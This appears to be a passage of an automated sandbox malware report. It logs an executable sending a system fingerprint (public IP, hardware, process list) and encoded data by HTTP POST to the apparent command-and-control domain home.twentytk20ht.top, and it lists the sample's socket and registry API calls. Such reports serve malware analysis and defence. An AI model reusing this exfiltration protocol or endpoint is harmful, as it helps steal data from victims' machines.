                                                        Dec 23, 2024 06:54:21.730150938 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730201960 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730221033 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730340004 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730396032 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730406046 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730446100 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730494022 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730504036 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730572939 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730582952 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730618954 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730653048 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730745077 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730762005 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730885029 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730895042 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730942011 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.730952024 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.731081963 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.731131077 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.731216908 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.731226921 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:21.731417894 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:52.275542974 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:52.275685072 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:52.275873899 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:52.276122093 CET4970580192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:52.395559072 CET8049705185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:53.029040098 CET4971180192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:53.148714066 CET8049711185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:53.148812056 CET4971180192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:53.149091959 CET4971180192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:53.268573999 CET8049711185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:54.633584023 CET8049711185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:54.633913040 CET8049711185.121.15.192192.168.2.8
                                                        Dec 23, 2024 06:54:54.633975029 CET4971180192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:54.634406090 CET4971180192.168.2.8185.121.15.192
                                                        Dec 23, 2024 06:54:54.753758907 CET8049711185.121.15.192192.168.2.8

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 23, 2024 06:54:16.233680964 CET6398153192.168.2.81.1.1.1
                                                        Dec 23, 2024 06:54:16.233781099 CET6398153192.168.2.81.1.1.1
                                                        Dec 23, 2024 06:54:16.371474028 CET53639811.1.1.1192.168.2.8
                                                        Dec 23, 2024 06:54:16.533917904 CET53639811.1.1.1192.168.2.8
                                                        Dec 23, 2024 06:54:19.871553898 CET6398453192.168.2.81.1.1.1
                                                        Dec 23, 2024 06:54:19.871619940 CET6398453192.168.2.81.1.1.1
                                                        Dec 23, 2024 06:54:20.010313988 CET53639841.1.1.1192.168.2.8
                                                        Dec 23, 2024 06:54:20.010340929 CET53639841.1.1.1192.168.2.8
                                                        Dec 23, 2024 06:54:52.887320042 CET5371753192.168.2.81.1.1.1
                                                        Dec 23, 2024 06:54:52.887399912 CET5371753192.168.2.81.1.1.1
                                                        Dec 23, 2024 06:54:53.028014898 CET53537171.1.1.1192.168.2.8
                                                        Dec 23, 2024 06:54:53.028038025 CET53537171.1.1.1192.168.2.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 23, 2024 06:54:16.233680964 CET192.168.2.81.1.1.10xd3cdStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                        Dec 23, 2024 06:54:16.233781099 CET192.168.2.81.1.1.10xc0d2Standard query (0)httpbin.org28IN (0x0001)false
                                                        Dec 23, 2024 06:54:19.871553898 CET192.168.2.81.1.1.10x63e8Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                        Dec 23, 2024 06:54:19.871619940 CET192.168.2.81.1.1.10x19e7Standard query (0)home.twentytk20ht.top28IN (0x0001)false
                                                        Dec 23, 2024 06:54:52.887320042 CET192.168.2.81.1.1.10x2366Standard query (0)home.twentytk20ht.topA (IP address)IN (0x0001)false
                                                        Dec 23, 2024 06:54:52.887399912 CET192.168.2.81.1.1.10xcf10Standard query (0)home.twentytk20ht.top28IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 23, 2024 06:54:16.533917904 CET1.1.1.1192.168.2.80xd3cdNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                        Dec 23, 2024 06:54:16.533917904 CET1.1.1.1192.168.2.80xd3cdNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                        Dec 23, 2024 06:54:20.010340929 CET1.1.1.1192.168.2.80x63e8No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                        Dec 23, 2024 06:54:53.028038025 CET1.1.1.1192.168.2.80x2366No error (0)home.twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • httpbin.org
                                                        • home.twentytk20ht.top

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.849705185.121.15.192806676C:\Users\user\Desktop\2OJYjm4J1B.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 23, 2024 06:54:20.133878946 CET12360OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                        Host: home.twentytk20ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 501223
                                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 33 32 35 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                        Data Ascii: { "ip": "8.46.123.189", "current_time": "1734933257", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                        Dec 23, 2024 06:54:20.253612041 CET4944OUTData Raw: 34 30 63 5a 55 4f 42 2b 46 38 62 6b 75 41 7a 57 76 6c 2b 50 7a 47 47 49 7a 5c 2f 45 34 37 43 35 63 71 47 58 30 34 56 4b 30 4a 56 63 75 79 37 4e 63 53 71 73 6f 7a 53 70 52 57 45 63 4a 4e 50 6e 6e 42 61 76 38 64 4b 4b 5c 2f 72 44 62 5c 2f 41 49 49
                                                        Data Ascii: 40cZUOB+F8bkuAzWvl+PzGGIz\/E47C5cqGX04VK0JVcuy7NcSqsozSpRWEcJNPnnBav8dKK\/rDb\/AIIz\/sb5IDfFwckceOtO\/wDZvCxqq\/8AwRo\/Y7wCJ\/i+Mg9PHOk9t397wifSv5yX05fCZ\/8ANO+Iv\/hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l
                                                        Dec 23, 2024 06:54:20.253739119 CET4944OUTData Raw: 49 30 65 4d 66 76 62 6e 39 35 5c 2f 7a 32 5c 2f 48 31 39 66 70 69 6a 50 38 61 50 4a 43 38 76 37 33 7a 50 39 52 41 4d 5c 2f 77 41 2b 5c 2f 46 50 61 54 35 6d 54 37 38 63 66 37 72 5c 2f 56 63 64 5c 2f 39 4b 7a 36 55 2b 53 4e 31 32 62 45 5c 2f 6e 39
                                                        Data Ascii: I0eMfvbn95\/z2\/H19fpijP8aPJC8v73zP9RAM\/wA+\/FPaT5mT78cf7r\/Vcd\/9Kz6U+SN12bE\/n9o+vb2\/+uazND9yH+8fw\/kKbT36\/h\/U0yuLkfl\/XyP8nz9dP2IPEd3P8F9R0ZbhmtNP8X6vp93pk+250+9tprXS9WjW\/wBMuTPY3ts82oXKiG6tngdklzEx3u\/vuvfC34aeJfMkvfCy6JfSb3bUvBt0ugNJ
                                                        Dec 23, 2024 06:54:20.253766060 CET2472OUTData Raw: 58 38 50 36 6d 6a 32 66 6e 2b 48 5c 2f 41 41 54 6f 4b 33 6c 65 79 5c 2f 6c 5c 2f 39 61 6b 4b 37 65 4f 33 62 5c 2f 50 57 70 36 4e 75 37 6a 46 61 47 33 74 66 4f 58 39 66 4d 72 31 48 4a 32 5c 2f 47 70 57 58 48 42 35 42 71 4b 54 74 2b 4e 42 72 44 66
                                                        Data Ascii: X8P6mj2fn+H\/AAToK3ley\/l\/9akK7eO3b\/PWp6Nu7jFaG3tfOX9fMr1HJ2\/GpWXHB5BqKTt+NBrDf5fqiOiiig1K9FFFBpT6\/Ij8v3\/T\/wCvUL\/dP4fzFWqr0GhFsPt\/n8KQqV5z3\/GpqQru9fwqOdef9fM09p5fj\/wCntH94f5\/GmVYqLYfb\/P4VZ2EEnb8f6VB3f6D+VWmXPB4IqFlxweQaAGP90\/h\/MU
                                                        Dec 23, 2024 06:54:20.253864050 CET2472OUTData Raw: 41 35 78 2b 76 62 74 54 6d 2b 62 66 43 37 6c 50 73 5c 2f 77 43 36 78 5c 2f 6e 38 36 44 6f 47 66 36 36 4e 39 5c 2f 33 49 5c 2f 77 42 36 66 36 66 35 5c 2f 4f 71 79 79 2b 59 7a 5c 2f 4e 35 61 52 5c 2f 38 41 4c 54 7a 66 39 66 38 41 35 37 38 38 56 4e
                                                        Data Ascii: A5x+vbtTm+bfC7lPs\/wC6x\/n86DoGf66N9\/3I\/wB6f6f5\/Oqyy+Yz\/N5aR\/8ALTzf9f8A5788VNJ5kfyf8++JovL5nz\/nr3pkm\/c7\/wAeRFiOb\/U8+lADP3nmTfufk\/5ZcefB\/nt7+tC7JI3\/AIX\/ANH8r97+4m\/P\/l+P9O3aaST5cfcTzcf9N+3+i9uP84pkjf303\/8ALb93\/wAsf\/11PtfOX9fM6C
                                                        Dec 23, 2024 06:54:20.254076004 CET4944OUTData Raw: 52 55 55 55 5c 2f 59 66 62 5c 2f 50 34 55 41 66 32 76 58 45 76 50 58 76 5c 2f 41 46 2b 76 58 39 65 75 4b 2b 55 4e 52 6c 7a 34 72 38 53 48 5c 2f 71 59 64 5a 5c 2f 48 64 71 4e 31 6a 38 6a 39 61 2b 68 39 49 38 53 61 4a 34 70 30 6e 53 5c 2f 45 58 68
                                                        Data Ascii: RUUU\/Yfb\/P4UAf2vXEvPXv\/AF+vX9euK+UNRlz4r8SH\/qYdZ\/HdqN1j8j9a+h9I8SaJ4p0nS\/EXhzVtP13QdYtob\/S9W0u6hvtP1CzmG6O4tbqB3imjYZBKscOCrbWDAflnY\/ts\/s4NcTXeofE0m4uZ5Lm4kbwf4+dpJppWllkbZ4WbLOzMx9ya\/wCJSHhV4teI9XM8DwB4YeIvHWL4bxtKlxHhuDuCeJeJq\/D9f
                                                        Dec 23, 2024 06:54:20.254173994 CET4944OUTData Raw: 6d 32 70 74 54 35 5a 48 66 50 57 50 5c 2f 50 48 5c 2f 77 42 61 6d 64 64 6e 79 66 4a 35 76 37 71 50 31 5c 2f 44 38 50 54 39 4b 77 35 46 35 5c 2f 77 42 66 49 30 70 39 66 6c 2b 70 54 6b 38 35 66 75 54 46 50 4c 5c 2f 35 36 78 66 36 37 36 66 35 2b 6d
                                                        Data Ascii: m2ptT5ZHfPWP\/PH\/wBamddnyfJ5v7qP1\/D8PT9Kw5F5\/wBfI0p9fl+pTk85fuTFPL\/56xf676f5+mahb5PuIWf\/AKadvr\/kdMVf\/eR7N52P5Xr\/AJ\/zioZIU2v8m\/j\/AFfnfmfw7celTzvy\/r5nYU\/kbZ\/GP5\/1\/wAnr3WT+9vj\/eSjzZP84p2cb1\/55f8A1qZj9277t7+b+n8v8frWprzrz\/r5jDyu
                                                        Dec 23, 2024 06:54:20.373562098 CET4944OUTData Raw: 67 67 6e 76 59 75 57 38 4b 2b 49 62 72 78 7a 34 57 2b 47 50 69 54 77 64 5a 36 64 34 67 6b 2b 4c 33 78 59 38 63 66 42 76 77 58 34 66 74 39 64 67 73 64 62 6d 38 55 66 44 72 77 58 34 52 2b 49 58 69 37 56 64 59 75 74 5a 74 64 4d 38 4a 2b 48 76 42 65
                                                        Data Ascii: ggnvYuW8K+Ibrxz4W+GPiTwdZ6d4gk+L3xY8cfBvwX4ft9dgsdbm8UfDrwX4R+IXi7VdYutZtdM8J+HvBeieEvGNjrGr+LNZ8U2enaDp2m69q3iP+x9C0uTVX+uh4x+HMoylPi\/LcLGFPA1prHLGZdKnRzPE4zB5fXqQx2Ew86dDG4jL8ZTw1acY0qvseeEnTnTlP5mr4C+L9Orh6MeBM3xVTFrNXhVl88Dmca7yOhTxOcQpTy
                                                        Dec 23, 2024 06:54:20.373610020 CET9888OUTData Raw: 64 66 35 31 48 51 61 6c 65 69 70 58 36 66 6a 5c 2f 51 30 7a 6c 44 32 35 48 2b 66 53 67 30 39 70 35 66 6a 5c 2f 77 43 42 2b 76 34 55 79 72 46 52 62 44 37 66 35 5c 2f 43 67 37 43 70 54 48 36 66 6a 5c 2f 51 31 50 35 54 2b 6e 36 48 5c 2f 41 41 70 6d
                                                        Data Ascii: df51HQaleipX6fj\/Q0zlD25H+fSg09p5fj\/wCB+v4UyrFRbD7f5\/Cg7CpTH6fj\/Q1P5T+n6H\/AApmx\/b8v\/sqDSn1\/r+v+GK1FSv0\/H+hqKg0In6\/h\/U0ypJO34\/0qOg09p5fj\/wCOTt+P9KjqxUGx\/b8v\/sqDo9p5fj\/AMAhfr+H9TULLu\/l9asP0\/H+hpuH9\/z\/APr1t7\/938TQp7fL\/Q5\/lS1
                                                        Dec 23, 2024 06:54:20.420855045 CET27192OUTData Raw: 4b 57 6d 6f 69 7a 76 43 62 71 7a 2b 32 77 62 4c 6e 37 4a 63 4d 30 74 74 35 6e 6b 79 45 75 6a 47 72 58 5c 2f 41 41 69 33 68 6a 5c 2f 6f 58 4e 42 5c 2f 38 45 2b 6e 5c 2f 77 44 79 50 57 7a 42 42 42 62 52 72 44 62 51 78 57 38 53 5c 2f 64 69 67 6a 53
                                                        Data Ascii: KWmoizvCbqz+2wbLn7JcM0tt5nkyEujGrX\/AAi3hj\/oXNB\/8E+n\/wDyPWzBBBbRrDbQxW8S\/digjSKNf91IwqjoOgr+puFOHeLsnxmJrcQcbYjiTCVaShh8DUyvLcDSwk1DDw5qdTCYalXnFexqTUa1Wo\/aYqveTpxw1LD\/AMbcb8WcDZ\/gcNQ4X8OsHwhjadalUxWPoZznOZVMXCnCupxnTzDG4ijCeInWhOvKnThF
                                                        Dec 23, 2024 06:54:20.540258884 CET7416OUTData Raw: 69 72 54 39 43 30 50 77 78 71 55 4f 6c 66 38 49 44 64 36 78 34 68 2b 4a 4d 66 68 62 54 4e 49 50 77 39 31 7a 53 66 46 75 6e 57 50 68 32 39 67 74 76 46 58 68 73 51 61 6e 6f 65 74 58 2b 6f 61 70 38 75 36 54 5c 2f 41 4d 46 4b 66 2b 43 66 58 37 52 55
                                                        Data Ascii: irT9C0PwxqUOlf8IDd6x4h+JMfhbTNIPw91zSfFunWPh29gtvFXhsQanoetX+oap8u6T\/AMFKf+CfX7RUGm+OfFvwU\/Yj\/ZN+Mtz4ou9e+NGnfHf9gaD9qv4e\/GC41zUDPrHiPwv8Svhzpx+LHhXX5oftF9qGja14ZFld6xPDPF4maa41bUZv5d2ZnZndmZ2YszMSzMzHLMzHJLEkkknJPJpteBivEfPMVjMTiJ4fK3hK9T
                                                        Dec 23, 2024 06:54:52.275542974 CET309INHTTP/1.1 502 Bad Gateway
                                                        Server: nginx/1.22.1
                                                        Date: Mon, 23 Dec 2024 05:54:52 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.849711185.121.15.192806676C:\Users\user\Desktop\2OJYjm4J1B.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 23, 2024 06:54:53.149091959 CET353OUTPOST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
                                                        Host: home.twentytk20ht.top
                                                        Accept: */*
                                                        Content-Type: application/json
                                                        Content-Length: 209
                                                        Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                        Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
                                                        Dec 23, 2024 06:54:54.633584023 CET309INHTTP/1.1 502 Bad Gateway
                                                        Server: nginx/1.22.1
                                                        Date: Mon, 23 Dec 2024 05:54:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.84970434.226.108.1554436676C:\Users\user\Desktop\2OJYjm4J1B.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-23 05:54:18 UTC52OUTGET /ip HTTP/1.1
                                                        Host: httpbin.org
                                                        Accept: */*
                                                        2024-12-23 05:54:18 UTC224INHTTP/1.1 200 OK
                                                        Date: Mon, 23 Dec 2024 05:54:18 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 31
                                                        Connection: close
                                                        Server: gunicorn/19.9.0
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: true
                                                        2024-12-23 05:54:18 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                        Data Ascii: { "origin": "8.46.123.189"}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:00:54:13
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\2OJYjm4J1B.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\2OJYjm4J1B.exe"
                                                        Imagebase:0x250000
                                                        File size:4'456'448 bytes
                                                        MD5 hash:49F7C4981EB383AED2C3F6588545B605
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.2%
                                                          Total number of Nodes:245
                                                          Total number of Limit Nodes:41
                                                          execution_graph 68205 305a50 68206 305a58 68205->68206 68211 305ea0 68205->68211 68207 305b50 68206->68207 68210 305b88 68206->68210 68217 305a99 68206->68217 68207->68210 68212 305eb4 68207->68212 68213 305b7a 68207->68213 68208 305e96 68235 319480 closesocket 68208->68235 68210->68208 68222 31a920 68210->68222 68234 319320 closesocket 68210->68234 68236 306f10 socket ioctlsocket connect getsockname closesocket 68212->68236 68226 3070a0 68213->68226 68216 305ec2 68216->68216 68217->68210 68219 3070a0 6 API calls 68217->68219 68233 306f10 socket ioctlsocket connect getsockname closesocket 68217->68233 68219->68217 68223 31a944 68222->68223 68224 31a977 send 68223->68224 68225 31a94b 68223->68225 68224->68210 68225->68210 68230 3070ae 68226->68230 68228 3071a7 68228->68210 68229 30717f 68229->68228 68242 319320 closesocket 68229->68242 68230->68228 68230->68229 68237 31a8c0 68230->68237 68241 3071c0 socket ioctlsocket connect getsockname 68230->68241 68233->68217 68234->68210 68235->68211 68236->68216 68238 31a903 recvfrom 68237->68238 68239 31a8e6 68237->68239 68240 31a8ed 68238->68240 68239->68238 68239->68240 68240->68230 68241->68230 68242->68228 68123 26d5e0 68124 26d652 WSAStartup 68123->68124 68125 26d5f0 68123->68125 68124->68125 68243 28b400 68244 28b40b 68243->68244 68245 28b425 68243->68245 68248 257770 68244->68248 68246 28b421 68249 2577b6 recv 68248->68249 68250 257790 68248->68250 68251 257799 68249->68251 68250->68249 68250->68251 68251->68246 68252 28e400 68253 28e412 68252->68253 68254 28e459 68252->68254 68256 2868b0 closesocket 68253->68256 68256->68254 68257 28b3c0 68258 28b3cb 68257->68258 68259 28b3ee 68257->68259 68263 2576a0 68258->68263 68267 289290 68258->68267 68260 28b3ea 68264 2576e6 send 68263->68264 68265 2576c0 68263->68265 68266 2576c9 68264->68266 68265->68264 68265->68266 68266->68260 68268 2576a0 send 68267->68268 68270 2892e5 68268->68270 68269 289392 68269->68260 68270->68269 68271 289335 WSAIoctl 68270->68271 68271->68269 68272 289366 68271->68272 68272->68269 68273 289371 setsockopt 68272->68273 68273->68269 68126 304720 68130 304728 68126->68130 68127 304733 68129 304774 68130->68127 68137 30476c 68130->68137 68138 305540 closesocket 68130->68138 68132 30482e 68132->68137 68139 309270 68132->68139 68134 304860 68144 304950 68134->68144 68136 304878 68137->68136 68150 3030a0 closesocket 68137->68150 68138->68132 68151 30a440 68139->68151 68141 309297 68143 3092ab 68141->68143 68179 30bbe0 closesocket 68141->68179 68143->68134 68145 304966 68144->68145 68147 3049c5 68145->68147 68149 3049b9 68145->68149 68180 30bbe0 closesocket 68145->68180 68146 304aa0 gethostname 68146->68147 68146->68149 68147->68137 68149->68146 68149->68147 68150->68129 68177 30a46b 68151->68177 68152 30aa03 RegOpenKeyExA 68153 30ab70 RegOpenKeyExA 68152->68153 68154 30aa27 RegQueryValueExA 68152->68154 68157 30ac34 RegOpenKeyExA 68153->68157 68174 30ab90 68153->68174 68155 30aa71 68154->68155 68156 30aacc RegQueryValueExA 68154->68156 68155->68156 68163 30aa85 RegQueryValueExA 68155->68163 68158 30ab66 RegCloseKey 68156->68158 68159 30ab0e 68156->68159 68160 30acf8 RegOpenKeyExA 68157->68160 68176 30ac54 68157->68176 68158->68153 68159->68158 68167 30ab1e RegQueryValueExA 68159->68167 68161 30ad56 RegEnumKeyExA 68160->68161 68164 30ad14 68160->68164 68162 30ad9b 68161->68162 68161->68164 68165 30ae16 RegOpenKeyExA 68162->68165 68166 30aab3 68163->68166 68164->68141 68168 30ae34 RegQueryValueExA 68165->68168 68169 30addf RegEnumKeyExA 68165->68169 68166->68156 68170 30ab4c 68167->68170 68171 30af43 RegQueryValueExA 68168->68171 68178 30adaa 68168->68178 68169->68164 68169->68165 68170->68158 68172 30b052 RegQueryValueExA 68171->68172 68171->68178 68173 30adc7 RegCloseKey 68172->68173 68172->68178 68173->68169 68174->68157 68175 30afa0 RegQueryValueExA 68175->68178 68176->68160 68177->68152 68177->68164 68178->68171 68178->68172 68178->68173 68178->68175 68179->68143 68180->68149 68274 303c00 68275 303c23 68274->68275 68276 303c0d 68274->68276 68275->68276 68278 31b180 68275->68278 68279 31b2e3 68278->68279 68280 31b19b 68278->68280 68279->68276 68280->68279 68283 31b2a9 getsockname 68280->68283 68285 31b020 closesocket 68280->68285 68286 31af30 68280->68286 68290 31b060 68280->68290 68295 31b020 68283->68295 68285->68280 68287 31af63 socket 68286->68287 68288 31af4c 68286->68288 68287->68280 68288->68287 68289 31af52 68288->68289 68289->68280 68294 31b080 68290->68294 68291 31b0b0 connect 68292 31b0bf WSAGetLastError 68291->68292 68293 31b0ea 68292->68293 68292->68294 68293->68280 68294->68291 68294->68292 68294->68293 68296 31b052 68295->68296 68297 31b029 68295->68297 68296->68280 68298 31b04b closesocket 68297->68298 68299 31b03e 68297->68299 68298->68296 68299->68280 68300 31a080 